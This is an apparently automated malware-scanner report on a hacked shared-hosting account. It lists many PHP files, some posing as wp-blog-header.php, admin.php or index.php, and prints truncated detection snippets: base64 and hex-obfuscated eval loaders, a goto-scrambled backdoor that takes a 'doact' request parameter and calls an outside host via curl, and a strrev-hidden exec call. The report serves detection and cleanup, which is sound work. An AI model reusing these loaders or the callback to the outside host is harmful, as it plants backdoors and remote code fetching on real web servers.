Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/perl5/bin/input.php Size: 1.49 kB Created: 2023-02-21 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/perl5/bin/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/perl5/lib/perl5/admin.php Size: 1.49 kB Created: 2023-08-05 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/perl5/lib/perl5/index.php Size: 1.49 kB Created: 2023-05-02 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/perl5/lib/input.php Size: 1.49 kB Created: 2023-09-20 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/perl5/lib/admin.php Size: 1.49 kB Created: 2023-11-11 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/perl5/lib/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/perl5/text.php Size: 1.49 kB Created: 2023-10-10 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/perl5/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/public_ftp/incoming/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/public_ftp/text.php Size: 1.49 kB Created: 2023-09-11 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_ftp/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/public_html/gcp/pages.php Size: 9.94 kB Created: 2022-09-02 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit align Line: 6 Warning Code alignment technique is usually used for the obfuscation of malicious code | <?php $l1fh2s=$GLOBALS["b6b6666"]($l1SiN);$l1FpxA=$l1k($l1fh2s["host"],isset($l1fh2s["port"])
| Exploit reversed Line: 6 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions | <?php ecalper_rts
| Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php cexe
|
|
/custdata02/turtle/public_html/index.php Size: 4.18 kB Created: 2024-06-04 20:46:22 Modified: 2024-06-12 19:36:07 Dangers: 1
| Description | Match |
|---|
Sign 531da465 Dangerous Malware Signature (hash: 531da465) | <?php <?php
@set_time_limit(5000);
@ignore_user_abort(1);
$goto = 'mm042';
$htwe = 'http';
if(ishtt()){
$http = 'https';
}else{
$http = 'http';
}
$ddur_tmp = st_uri();
if ($ddur_tmp == ''){
$ddur_tmp = '/';
}
$ddur = urlencode($ddur_tmp);
function st_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$ddur = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$ddur = $_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];
}else{
$ddur = $_SERVER['PHP_SELF'].'?...
|
|
/custdata02/turtle/public_html/moving.page/9QRtbfOjW8y.php Size: 43.44 kB Created: 2024-06-01 02:24:40 Modified: 2024-06-01 08:12:17 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php NVCh
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) | <?php y2HY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
